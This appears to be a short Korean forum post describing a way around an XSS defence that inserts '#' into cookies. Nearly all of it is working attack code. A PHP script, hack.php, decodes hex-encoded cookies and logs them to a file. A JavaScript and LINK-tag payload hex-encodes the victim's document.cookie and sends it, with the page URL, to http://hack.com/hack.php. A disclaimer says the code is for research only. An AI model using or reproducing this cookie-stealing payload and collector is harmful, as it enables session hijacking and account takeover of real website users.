xss 방어 코드 우회 공격.

xss 방어 코드 우회 공격.
** PC에서 보셔야 잘 보입니다..
** 연구용으로만 활용하시고 실제 공격 하시면 안됩니다.. 

xss를 방어로 쿠키에 #를 넣는 경우가 있는데요. 
고심끝에 ascii를 hex로 변환해서 쿠키를 획득후
 서버 코드에서 받은 hex를 다시 ascii를 변환하는 코딩작업을 했습니디.
이미 나왔는지도 모르지만 재미삼아 기존 코드를 수정했습니다..

1. 서버 코드
hack.php
받은 hex를 ascii로변환 저장

<?php /* date : 2007.12.19 add by kyoung chip jang */ // hex to ascii function hex2ascii($hex) { $ascii=''; $hex=str_replace(" ", "", $hex); for($i=0; $i<strlen($hex); $i=$i+2) { $ascii.=chr(hexdec(substr($hex, $i, 2))); } return($ascii); } // get cookie $result = hex2ascii($cookie); $log=fopen("./give_me_cookie.txt","a+"); fputs($log, "$result"."\n"); fclose($log); // clear cache header("Cache-Control:no-cache"); header("Expires:0" ); header("Pragma:no-cache"); ?>

2. 공격 코드 
 얻은 쿠키를 hex로 변환

<script>function DoAsciiHex(x,dir){hex="0123456789ABCDEF";almostAscii=' !"#$%&'+"'"+'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ['+'\\'+']^_`abcdefghijklmnopqrstuvwxyz{|}';r="";if(dir=="A2H"){for(i=0;i<x.length;i++){let=x.charAt(i);pos=almostAscii.indexOf(let)+32;h16=Math.floor(pos/16);h1=pos%16;r+=hex.charAt(h16)+hex.charAt(h1);};};if(dir=="H2A"){for(i=0;i<x.length;i++){let1=x.charAt(2*i);let2=x.charAt(2*i+1);val=hex.indexOf(let1)*16+hex.indexOf(let2);r+=almostAscii.charAt(val-32);};};return r;}</script> <LINK REL="stylesheet" HREF="javascript:window.location='http://hack.com/hack.php?url='+location.href+'&cookie='+DoAsciiHex(document.cookie,'A2H')">